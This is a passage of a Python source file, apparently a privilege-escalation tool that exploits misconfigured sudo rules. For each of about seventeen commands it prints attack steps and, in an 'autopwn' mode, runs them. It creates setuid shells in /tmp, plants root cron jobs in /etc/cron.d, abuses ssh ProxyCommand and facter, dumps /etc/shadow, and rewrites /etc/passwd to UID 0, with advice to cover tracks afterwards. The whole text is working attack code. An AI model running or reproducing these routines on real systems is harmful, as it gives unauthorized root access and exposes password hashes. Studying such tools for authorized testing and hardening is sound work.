[*] sudo -u " + ssh_user + " ssh -o ProxyCommand='/tmp/./evil.sh' @localhost" + ENDC 1316 | print OKBLUE + "[5] Finally we wait execute the setuid shell in /tmp/!" + ENDC 1317 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 1318 | sys.exit() 1319 | 1320 | elif args.autopwn: 1321 | 1322 | question = ask_user(OKRED + "\n[?] Do you wish to abuse the ssh rule? " + ENDC) 1323 | 1324 | if question == True: 1325 | 1326 | print OKGREEN + "\n[!] Pwning the ssh rule now!!!" + ENDC 1327 | print OKGREEN + "\n[!] Creating malicious file!" + ENDC 1328 | call("echo 'cp /bin/ksh /tmp/pwnage ; chmod 4777 /tmp/pwnage' > /tmp/evil.sh", shell=True) 1329 | call("chmod +x /tmp/evil.sh", shell=True) 1330 | 1331 | sleep(0.5) 1332 | 1333 | if (ssh_user == "ALL") or (ssh_user == "root"): 1334 | print OKGREEN + "\n[!] Running ssh command to execute malicious script as root!" + ENDC 1335 | call("sudo ssh -o ProxyCommand='/tmp/./evil.sh' " + username + "@localhost", shell=True) 1336 | else: 1337 | print OKGREEN + "\n[!] Running ssh command to execute malicious script as " + ssh_user + "!" + ENDC 1338 | call("sudo -u " + ssh_user + " ssh -o ProxyCommand='/tmp/./evil.sh' " + username + "@localhost", shell=True) 1339 | 1340 | print OKGREEN + "\n[!] EXECUTE /tmp/pwnage TO GET SHELL!" + ENDC 1341 | 1342 | if question == False: 1343 | sudopwner() 1344 | 1345 | 1346 | # SUDO cp Rule Pwnage 1347 | def cp(): 1348 | 1349 | if args.info: 1350 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 1351 | print OKBLUE + "[+] To pwn this rule multiple steps need to be taken." + ENDC 1352 | print OKBLUE + "[1] First create a malicious script locally that will be executed by cron: " + ENDC 1353 | print OKRED + " [*] echo 'cp /bin/ksh /tmp/pwnage ; chmod 4777 /tmp/pwnage' > /tmp/evil.sh" + ENDC 1354 | print OKBLUE + "[2] Next change the rights to that malicious file to be executable: " + ENDC 1355 | print OKRED + " [*] chmod +x /tmp/evil.sh" + ENDC 1356 | print OKBLUE + "[3] Next we need to create a file that will be placed in /etc/cron.d/ that will be executed: " + ENDC 1357 | print OKRED + " [*] echo '*/1 * * * * root /tmp/evil.sh' > /tmp/pwncron" + ENDC 1358 | print OKBLUE + "[4] Next we need to put that file into /etc/cron.d: " + ENDC 1359 | print OKRED + " [*] sudo cp /tmp/pwncron /etc/cron.d/pwncron" + ENDC 1360 | print OKBLUE + "[5] Finally we wait until the file pwnage is executed in cron.d and a setuid binary is created in /tmp/" + ENDC 1361 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 1362 | sys.exit() 1363 | 1364 | elif args.autopwn: 1365 | 1366 | question = ask_user(OKRED + "\n[?] Do you wish to abuse the cp rule? " + ENDC) 1367 | 1368 | if question == True: 1369 | 1370 | print OKGREEN + "\n[!] Pwning the cp rule now!!!" + ENDC 1371 | print OKGREEN + "\n[!] Creating malicious file!" + ENDC 1372 | call("echo 'cp /bin/ksh /tmp/pwnage ; chmod 4777 /tmp/pwnage' > /tmp/evil.sh", shell=True) 1373 | call("chmod +x /tmp/evil.sh", shell=True) 1374 | 1375 | sleep(0.5) 1376 | 1377 | print OKGREEN + "\n[!] Creating malicious cron file!" + ENDC 1378 | call("echo '*/1 * * * * root /tmp/evil.sh' > /tmp/pwncron",shell=True) 1379 | 1380 | sleep(0.5) 1381 | 1382 | print OKGREEN + "\n[!] Running cp command to move pwncron to /etc/cron.d/!" + ENDC 1383 | call("sudo cp /tmp/pwncron /etc/cron.d/pwncron", shell=True) 1384 | 1385 | print OKGREEN + "\n[!] Wait for pwncron to run in 1 minute!" + ENDC 1386 | print OKGREEN + "\n[!] EXECUTE /tmp/pwnage TO GET SHELL!" + ENDC 1387 | 1388 | if question == False: 1389 | sudopwner() 1390 | 1391 | 1392 | # SUDO dd Rule Pwnage 1393 | def dd(): 1394 | 1395 | if args.info: 1396 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 1397 | print OKBLUE + "[+] To pwn this rule multiple steps need to be taken." + ENDC 1398 | print OKBLUE + "[1] First create a malicious script locally that will be executed by cron: " + ENDC 1399 | print OKRED + " [*] echo 'cp /bin/ksh /tmp/pwnage ; chmod 4777 /tmp/pwnage' > /tmp/evil.sh" + ENDC 1400 | print OKBLUE + "[2] Next change the rights to that malicious file to be executable: " + ENDC 1401 | print OKRED + " [*] chmod +x /tmp/evil.sh" + ENDC 1402 | print OKBLUE + "[3] Next we need to create a file that will be placed in /etc/cron.d/ that will be executed: " + ENDC 1403 | print OKRED + " [*] echo '*/1 * * * * root /tmp/evil.sh' > /tmp/pwncron" + ENDC 1404 | print OKBLUE + "[4] Next we need to put that file into /etc/cron.d: " + ENDC 1405 | print OKRED + " [*] sudo dd if=/tmp/pwncron of=/etc/cron.d/pwncron" + ENDC 1406 | print OKBLUE + "[5] Finally we wait until the file pwnage is executed in cron.d and a setuid binary is created in /tmp/" + ENDC 1407 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 1408 | sys.exit() 1409 | 1410 | elif args.autopwn: 1411 | 1412 | question = ask_user(OKRED + "\n[?] Do you wish to abuse the dd rule? " + ENDC) 1413 | 1414 | if question == True: 1415 | 1416 | print OKGREEN + "\n[!] Pwning the dd rule now!!!" + ENDC 1417 | print OKGREEN + "\n[!] Creating malicious file!" + ENDC 1418 | call("echo 'cp /bin/ksh /tmp/pwnage ; chmod 4777 /tmp/pwnage' > /tmp/evil.sh", shell=True) 1419 | call("chmod +x /tmp/evil.sh", shell=True) 1420 | 1421 | sleep(0.5) 1422 | 1423 | print OKGREEN + "\n[!] Creating malicious cron file!" + ENDC 1424 | call("echo '*/1 * * * * root /tmp/evil.sh' > /tmp/pwncron",shell=True) 1425 | 1426 | sleep(0.5) 1427 | 1428 | print OKGREEN + "\n[!] Running dd command to move pwncron to /etc/cron.d/!" + ENDC 1429 | call("sudo dd if=/tmp/pwncron of=/etc/cron.d/pwncron", shell=True) 1430 | 1431 | print OKGREEN + "\n[!] Wait for pwncron to run in 1 minute!" + ENDC 1432 | print OKGREEN + "\n[!] EXECUTE /tmp/pwnage TO GET SHELL!" + ENDC 1433 | 1434 | if question == False: 1435 | sudopwner() 1436 | 1437 | 1438 | # SUDO crontab Rule Pwnage 1439 | def crontab(): 1440 | 1441 | if args.info: 1442 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 1443 | print OKBLUE + "[+] To pwn this rule multiple steps need to be taken." + ENDC 1444 | print OKBLUE + "[1] First create a malicious script locally that will be executed by cron: " + ENDC 1445 | print OKRED + " [*] echo 'cp /bin/ksh /tmp/pwnage ; chmod 4777 /tmp/pwnage' > /tmp/evil.sh" + ENDC 1446 | print OKBLUE + "[2] Next change the rights to that malicious file to be executable: " + ENDC 1447 | print OKRED + " [*] chmod +x /tmp/evil.sh" + ENDC 1448 | print OKBLUE + "[3] Next we need to create a file that will be placed in roots crontab: " + ENDC 1449 | print OKRED + " [*] echo '*/1 * * * * root /tmp/evil.sh' > /tmp/pwncron" + ENDC 1450 | print OKBLUE + "[4] Next we need to add that cron to roots crontab: " + ENDC 1451 | print OKRED + " [*] sudo sudo crontab /tmp/pwncron" + ENDC 1452 | print OKBLUE + "[5] Finally we wait until the file pwnage is executed in cron.d and a setuid binary is created in /tmp/" + ENDC 1453 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 1454 | sys.exit() 1455 | 1456 | elif args.autopwn: 1457 | 1458 | question = ask_user(OKRED + "\n[?] Do you wish to abuse the crontab rule? " + ENDC) 1459 | 1460 | if question == True: 1461 | 1462 | print OKGREEN + "\n[!] Pwning the crontab rule now!!!" + ENDC 1463 | print OKGREEN + "\n[!] Creating malicious file!" + ENDC 1464 | call("echo 'cp /bin/ksh /tmp/pwnage ; chmod 4777 /tmp/pwnage' > /tmp/evil.sh", shell=True) 1465 | call("chmod +x /tmp/evil.sh", shell=True) 1466 | 1467 | sleep(0.5) 1468 | 1469 | print OKGREEN + "\n[!] Creating malicious cron file!" + ENDC 1470 | call("echo '*/1 * * * * root /tmp/evil.sh' > /tmp/pwncron",shell=True) 1471 | 1472 | sleep(0.5) 1473 | 1474 | print OKGREEN + "\n[!] Running crontab command!" + ENDC 1475 | call("sudo crontab /tmp/pwncron", shell=True) 1476 | 1477 | print OKGREEN + "\n[!] Wait for pwncron to run in 1 minute!" + ENDC 1478 | print OKGREEN + "\n[!] EXECUTE /tmp/pwnage TO GET SHELL!" + ENDC 1479 | 1480 | if question == False: 1481 | sudopwner() 1482 | 1483 | 1484 | # SUDO chown Rule Pwnage 1485 | def chown(): 1486 | 1487 | print OKRED + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 1488 | print OKYELLOW + "\n[!] NO AUTO PWNAGE AVAILABLE.... FOLLOW BELOW STEPS TO PWN!!!" + ENDC 1489 | print OKBLUE + "[+] To pwn this rule multiple steps need to be taken." + ENDC 1490 | print OKBLUE + "[1] First we need to change the ownership of /etc/passwd (TAKE NOTE OF YOUR UID FIRST): " + ENDC 1491 | print OKRED + " [*] sudo chown " + username + ":root /etc/passwd" + ENDC 1492 | print OKBLUE + "[2] Now that we own /etc/passwd we can edit it and change our UID to 0: " + ENDC 1493 | print OKRED + " [*] vim /etc/passwd (Change your UID to 0)" + ENDC 1494 | print OKBLUE + "[3] Next logout and log back in. You will notice your UID is now 0 and have root level access." + ENDC 1495 | print OKBLUE + "[4] To be sneaky we can change the file back to being owned by root: " + ENDC 1496 | print OKRED + " [*] sudo chown root:root /etc/passwd" + ENDC 1497 | print OKRED + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 1498 | sys.exit() 1499 | 1500 | 1501 | # SUDO chmod Rule Pwnage 1502 | def chmod(): 1503 | 1504 | print OKRED + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 1505 | print OKYELLOW + "\n[!] NO AUTO PWNAGE AVAILABLE.... FOLLOW BELOW STEPS TO PWN!!!" + ENDC 1506 | print OKBLUE + "[+] To pwn this rule multiple steps need to be taken." + ENDC 1507 | print OKBLUE + "[1] First for safety purposes we need to get the current permissions of /etc/passwd (HINT: SHOULD BE 644): " + ENDC 1508 | print OKRED + " [*] stat -c '%a %n' /etc/passwd" + ENDC 1509 | print OKBLUE + "[2] Now change the ownership of /etc/passwd so you can edit it (I am doing 777 because why not): " + ENDC 1510 | print OKRED + " [*] sudo chmod 777 /etc/passwd" + ENDC 1511 | print OKBLUE + "[3] Now that /etc/passwd is world writable we can change our UID to 0: " + ENDC 1512 | print OKRED + " [*] vim /etc/passwd (Change your UID to 0)" + ENDC 1513 | print OKBLUE + "[4] Next logout and log back in. You will notice your UID is now 0 and have root level access." + ENDC 1514 | print OKBLUE + "[5] Finally lets do the right thing and change the permissions back to 644 on /etc/passwd: " + ENDC 1515 | print OKRED + " [*] sudo chmod 644 /etc/passwd" + ENDC 1516 | print OKRED + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 1517 | sys.exit() 1518 | 1519 | 1520 | # SUDO cat Rule Pwnage 1521 | def cat(cat_user): 1522 | 1523 | if args.info: 1524 | print OKYELLOW + "\n---------------------------------------------------------------------------------------------------------------------------------------------------" + ENDC 1525 | print OKYELLOW + "\n[!] HOW TO PWN THIS RULE!!!" + ENDC 1526 | print OKBLUE + "[+] To pwn this rule we will use sudo cat to print out a root owned file (this can be any file owned by root you want but we are using /etc/shadow): " + ENDC 1527 | if (cat_user == "ALL") or (cat_user == "root"): 1528 | print OKRED + " [*] sudo cat /etc/shadow" + ENDC 1529 | else: 1530 | print OKRED + " [*] sudo -u " + cat_user + " cat " + ENDC 1531 | print OKYELLOW + "\n---------------------------------------------------------------------------------------------------------------------------------------------------\n" + ENDC 1532 | sys.exit() 1533 | 1534 | elif args.autopwn: 1535 | 1536 | question = ask_user(OKRED + "\n[?] Do you wish to abuse the cat rule? " + ENDC) 1537 | 1538 | if question == True: 1539 | 1540 | print OKGREEN + "[!] Pwning the cat rule now!!!" + ENDC 1541 | 1542 | if (cat_user == "ALL") or (cat_user == "root"): 1543 | print OKGREEN + "[!] Running cat command to get /etc/shadow contents!" + ENDC 1544 | call("sudo cat /etc/shadow", shell=True) 1545 | else: 1546 | filename = raw_input("\n" + OKBLUE + "[?] Enter file path/name of file you wish to cat as user " + cat_user + "(e.g. /home//.ssh/id_rsa): " + ENDC) 1547 | print OKGREEN + "[!] Running cat command as " + cat_user + " to get " + filename + "!" + ENDC 1548 | call("sudo -u " + cat_user + " cat " + filename, shell=True) 1549 | 1550 | if question == False: 1551 | sudopwner() 1552 | 1553 | 1554 | # SUDO mount Rule Pwnage 1555 | def mount(): 1556 | 1557 | print OKRED + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 1558 | print OKYELLOW + "\n[!] NO AUTO PWNAGE AVAILABLE.... FOLLOW BELOW STEPS TO PWN!!!" + ENDC 1559 | print OKBLUE + "[+] To pwn this rule multiple steps need to be taken." + ENDC 1560 | print OKBLUE + "[1] First take a USB drive of your choosing and format it to be ext3 filesystem (Linux command below): " + ENDC 1561 | print OKRED + " [*] mkfs -t ext3 " + ENDC 1562 | print OKBLUE + "[2] Now mount it on your attacking computer and place a setuid shell as root within it: " + ENDC 1563 | print OKRED + " [*] mount -t ext3 -o 'rw' " + ENDC 1564 | print OKRED + " [*] cp /bin/ksh /pwn ; chmod 4777 /pwn" + ENDC 1565 | print OKBLUE + "[3] Now take your USB drive and mount it on the victim machine as an ext3 filesystem: " + ENDC 1566 | print OKRED + " [*] sudo mount -t ext3 -o 'rw' " + ENDC 1567 | print OKBLUE + "[4] Execute the setuid shell within your drive and profit!" + ENDC 1568 | print OKRED + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 1569 | sys.exit() 1570 | 1571 | 1572 | # SUDO facter Rule Pwnage 1573 | def facter(facter_user): 1574 | 1575 | if args.info: 1576 | print OKYELLOW + "\n----------------------------------------------------------------------------------------------------------------------------------------" + ENDC 1577 | print OKBLUE + "[+] To pwn this rule multiple steps need to be taken." + ENDC 1578 | print OKBLUE + "[1] First create a malicious script locally that will be executed by facter: " + ENDC 1579 | print OKRED + " [*] echo 'Facter.add(:pwn) do setcode do pwn = Facter::Util::Resolution.exec('cp /bin/ksh /tmp/pwnage; chmod 4777 /tmp/pwnage') end end'" + ENDC 1580 | print OKBLUE + "[2] Now execute sudo facter with your new and improved fact script: " + ENDC 1581 | if (facter_user == "ALL") or (facter_user == "root"): 1582 | print OKRED + " [*] sudo facter --custom-dir=. pwn" + ENDC 1583 | else: 1584 | print OKRED + " [*] sudo -u " + facter_user + " facter --custom-dir=. pwn" + ENDC 1585 | print OKBLUE + "[3] Now execute your setuid shell that is waiting for you in /tmp/." + ENDC 1586 | print OKYELLOW + "\n----------------------------------------------------------------------------------------------------------------------------------------\n" + ENDC 1587 | sys.exit() 1588 | 1589 | elif args.autopwn: 1590 | 1591 | question = ask_user(OKRED + "\n[?] Do you wish to abuse the facter rule? " + ENDC) 1592 | 1593 | if question == True: 1594 | 1595 | print OKGREEN + "\n[!] Pwning the facter rule now!!!" + ENDC 1596 | print OKGREEN + "\n[!] Creating malicious fact!" + ENDC 1597 | call('''echo "Facter.add(:pwn) do setcode do pwn = Facter::Util::Resolution.exec('cp /bin/ksh /tmp/pwnage; chmod 4777 /tmp/pwnage') end end" > pwn.rb''', shell=True) 1598 | 1599 | sleep(0.5) 1600 | 1601 | if (facter_user == "ALL") or (facter_user == "root"): 1602 | print OKGREEN + "\n[!] Executing facter to execute our awesome fact to get setuid shell as root!" + ENDC 1603 | call("sudo facter --custom-dir=. pwn",shell=True) 1604 | else: 1605 | print OKGREEN + "\n[!] Executing facter to execute our awesome fact to get setuid shell as " + facter_user + "!" + ENDC 1606 | call("sudo -u " + facter_user + " facter --custom-dir=. pwn", shell=True) 1607 | 1608 | sleep(0.5) 1609 | 1610 | print OKGREEN + "\n[!] EXECUTE /tmp/pwnage TO GET SHELL!" + ENDC 1611 | 1612 | if question == False: 1613 | sudopwner() 1614 | 1615 | 1616 | # SUDO apt-get Rule Pwnage 1617 | def aptget(): 1618 | 1619 | print OKRED + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 1620 | print OKYELLOW + "\n[!] NO AUTO PWNAGE AVAILABLE.... FOLLOW BELOW STEPS TO PWN!!!" + ENDC 1621 | print OKBLUE + "[+] To pwn this rule multiple steps need to be taken." + ENDC 1622 | print OKBLUE + "[1] First we need to execute apt-get changelog in order to get into pager: " + ENDC 1623 | print OKRED + " [*] sudo apt-get changelog bash" + ENDC 1624 | print OKBLUE + "[2] Now type !/bin/bash and enjoy your shell!" + ENDC 1625 | print OKRED + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 1626 | sys.exit() 1627 | 1628 | 1629 | # SUDO sh Rule Pwnage 1630 | def sh(sh_user): 1631 | 1632 | if args.info: 1633 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 1634 | print OKYELLOW + "\n[!] HOW TO PWN THIS RULE!!!" + ENDC 1635 | print OKBLUE + "[+] To pwn this rule type the following command: " + ENDC 1636 | if (sh_user == "ALL") or (sh_user == "root"): 1637 | print OKRED + "[*] sudo /bin/sh" + ENDC 1638 | else: 1639 | print OKRED + "[*] sudo -u " + sh_user + " /bin/sh" + ENDC 1640 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 1641 | sys.exit() 1642 | 1643 | elif args.autopwn: 1644 | 1645 | question = ask_user( OKRED + "\n[?] Do you wish to abuse the sh rule? " + ENDC) 1646 | 1647 | if question == True: 1648 | 1649 | print OKGREEN + "[!] Pwning the sh rule now!!!" + ENDC 1650 | 1651 | if (sh_user == "ALL") or (sh_user == "root"): 1652 | print OKGREEN + "\n[!] Obtaining shell as root!" + ENDC 1653 | call("sudo /bin/sh", shell=True) 1654 | else: 1655 | print OKGREEN + "\n[!] Obtaining shell as " + sh_user + "!" + ENDC 1656 | call("sudo -u " + sh_user + " /bin/sh", shell=True) 1657 | 1658 | if question == False: 1659 | sudopwner() 1660 | 1661 | # SUDO ksh Rule Pwnage 1662 | def ksh(ksh_user): 1663 | 1664 | if args.info: 1665 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 1666 | print OKYELLOW + "\n[!] HOW TO PWN THIS RULE!!!" + ENDC 1667 | print OKBLUE + "[+] To pwn this rule type the following command: " + ENDC 1668 | if (ksh_user == "ALL") or (ksh_user == "root"): 1669 | print OKRED + "[*] sudo /bin/ksh" + ENDC 1670 | else: 1671 | print OKRED + "[*] sudo -u " + ksh_user + " /bin/ksh" + ENDC 1672 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 1673 | sys.exit() 1674 | 1675 | elif args.autopwn: 1676 | 1677 | question = ask_user( OKRED + "\n[?] Do you wish to abuse the ksh rule? " + ENDC) 1678 | 1679 | if question == True: 1680 | 1681 | print OKGREEN + "[!] Pwning the ksh rule now!!!" + ENDC 1682 | 1683 | if (ksh_user == "ALL") or (ksh_user == "root"): 1684 | print OKGREEN + "\n[!] Obtaining shell as root!" + ENDC 1685 | call("sudo /bin/ksh", shell=True) 1686 | else: 1687 | print OKGREEN + "\n[!] Obtaining shell as " + ksh_user + "!" + ENDC 1688 | call("sudo -u " + ksh_user + " /bin/ksh", shell=True) 1689 | 1690 | if question == False: 1691 | sudopwner() 1692 | 1693 | 1694 | # SUDO zsh Rule Pwnage 1695 | def zsh(zsh_user): 1696 | 1697 | if args.info: 1698 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 1699 | print OKYELLOW + "\n[!] HOW TO PWN THIS RULE!!!" + ENDC 1700 | print OKBLUE + "[+] To pwn this rule type the following command: " + ENDC 1701 | if (zsh_user == "ALL") or (zsh_user == "root"): 1702 | print OKRED + "[*] sudo /bin/sh" + ENDC 1703 | else: 1704 | print OKRED + "[*] sudo -u " + zsh_user + " /bin/sh" + ENDC 1705 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 1706 | sys.exit() 1707 | 1708 | elif args.autopwn: 1709 | 1710 | question = ask_user( OKRED + "\n[?] Do you wish to abuse the sh rule? " + ENDC) 1711 | 1712 | if question == True: 1713 | 1714 | print OKGREEN + "[!] Pwning the sh rule now!!!" + ENDC 1715 | 1716 | if (zsh_user == "ALL") or (zsh_user == "root"): 1717 | print OKGREEN + "\n[!] Obtaining shell as root!" + ENDC 1718 | call("sudo /bin/zsh", shell=True) 1719 | else: 1720 | print OKGREEN + "\n[!] Obtaining shell as " + zsh_user + "!" + ENDC 1721 | call("sudo -u " + zsh_user + " /bin/zsh", shell=True) 1722 | 1723 | if question == False: 1724 | sudopwner() 1725 | 1726 | 1727 | # SUDO nano Rule Pwnage 1728 | def nano(nano_user): 1729 | 1730 | print OKRED + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 1731 | print OKYELLOW + "\n[!] NO AUTO PWNAGE AVAILABLE.... FOLLOW BELOW STEPS TO PWN: " + ENDC 1732 | print OKBLUE + "[1] The first step is to open a file using the 'nano' command: " + ENDC 1733 | if (nano_user == "ALL") or (nano_user == "root"): 1734 | print OKRED + " [*] sudo nano " + ENDC 1735 | else: 1736 | print OKRED + " [*] sudo -u " + nano_user + " nano " + ENDC 1737 | print OKBLUE + "[2] Once the file is open enter either 'F5' or '^R' which will allow you to load a new file into nano." + ENDC 1738 | print OKRED + " [*] Now enter a file you wish to load into nano!" + ENDC 1739 | print OKRED + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 1740 | sys.exit() 1741 | 1742 | def journalctl(journalctl_user): 1743 | 1744 | print OKRED + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 1745 | print OKYELLOW + "\n[!] NO AUTO PWNAGE AVAILABLE.... FOLLOW BELOW STEPS TO PWN: " + ENDC 1746 | print OKBLUE + "[1] The first step is to view logs by running the 'journalctl' command: " + ENDC 1747 | if (journalctl_user == "ALL") or (journalctl_user == "root"): 1748 | print OKRED + " [*] sudo journalctl" + ENDC 1749 | else: 1750 | print OKRED + " [*] sudo -u " + journalctl_user + " journalctl" + ENDC 1751 | print OKBLUE + "[2] Once the log is displayed type '!/bin/bash': " + ENDC 1752 | print OKRED + " [*] !/bin/bash" + ENDC 1753 | print OKRED + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 1754 | sys.exit() 1755 | 1756 | def dmesg(dmesg_user): 1757 | 1758 | print OKRED + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 1759 | print OKYELLOW + "\n[!] NO AUTO PWNAGE AVAILABLE.... FOLLOW BELOW STEPS TO PWN: " + ENDC 1760 | print OKBLUE + "[1] The first step is to view logs by running the 'dmesg --human' command: " + ENDC 1761 | if (dmesg_user == "ALL") or (dmesg_user == "root"): 1762 | print OKRED + " [*] sudo dmesg --human" + ENDC 1763 | else: 1764 | print OKRED + " [*] sudo -u " + dmesg_user + " dmesg --human" + ENDC 1765 | print OKBLUE + "[2] Once the log is displayed type '!/bin/bash': " + ENDC 1766 | print OKRED + " [*] !/bin/bash" + ENDC 1767 | print OKRED + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 1768 | sys.exit() 1769 | 1770 | def nice(nice_user): 1771 | 1772 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 1773 | print OKYELLOW + "\n[!] HOW TO PWN THIS RULE!!!" + ENDC 1774 | print OKBLUE + "[+] To pwn this rule type the following command: " + ENDC 1775 | if (nice_user == "ALL") or (nice_user == "root"): 1776 | print OKRED + "[*] sudo /bin/nice -n 1 /bin/bash" + ENDC 1777 | else: 1778 | print OKRED + "[*] sudo -u " + nice_user + " /bin/nice -n 1 /bin/bash" + ENDC 1779 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 1780 | sys.exit() 1781 | 1782 | if __name__ == "__main__": 1783 | main() 1784 | --------------------------------------------------------------------------------